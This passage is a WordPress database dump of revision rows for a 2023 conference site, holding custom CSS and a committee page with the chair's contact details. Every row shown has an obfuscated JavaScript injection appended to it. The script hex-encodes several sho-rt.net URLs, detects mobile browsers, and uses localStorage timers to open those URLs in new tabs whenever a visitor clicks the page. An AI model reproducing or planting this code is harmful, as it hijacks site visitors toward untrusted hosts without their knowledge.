Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 07:57:36','2023-06-27 07:57:36','',4849,'https://gsw2023.com/?p=4863',0,'revision','',0),
(4865,4,'2023-06-27 08:00:03','2023-06-27 08:00:03','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad, .zero-pad *{\n	padding: 0 !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 08:00:03','2023-06-27 08:00:03','',4823,'https://gsw2023.com/?p=4865',0,'revision','',0),
(4866,4,'2023-06-27 08:00:12','2023-06-27 08:00:12','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"medium\" style=\"vc_box_rounded\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 14pt;\"><strong>Chair</strong></span>\r\n\r\n<hr />\r\n\r\n<span style=\"font-size: 12pt;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"margin-right: 10px;\"><strong>E-mail:</strong></td>\r\n<td style=\"margin-right: 10px;\">aaelbary@aast.edu</td>\r\n<td style=\"margin-right: 10px;\">aaelbary@gsw2023.com</td>\r\n<td style=\"margin-right: 10px;\">gsw2023@aast.edu</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"margin-right: 10px;\">Office: +203 5497598</td>\r\n<td style=\"margin-right: 10px;\">Fax: +203 5497598</td>\r\n<td style=\"margin-right: 10px;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 08:00:12','2023-06-27 08:00:12','',4849,'https://gsw2023.com/?p=4866',0,'revision','',0),
(4868,4,'2023-06-27 08:01:26','2023-06-27 08:01:26','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2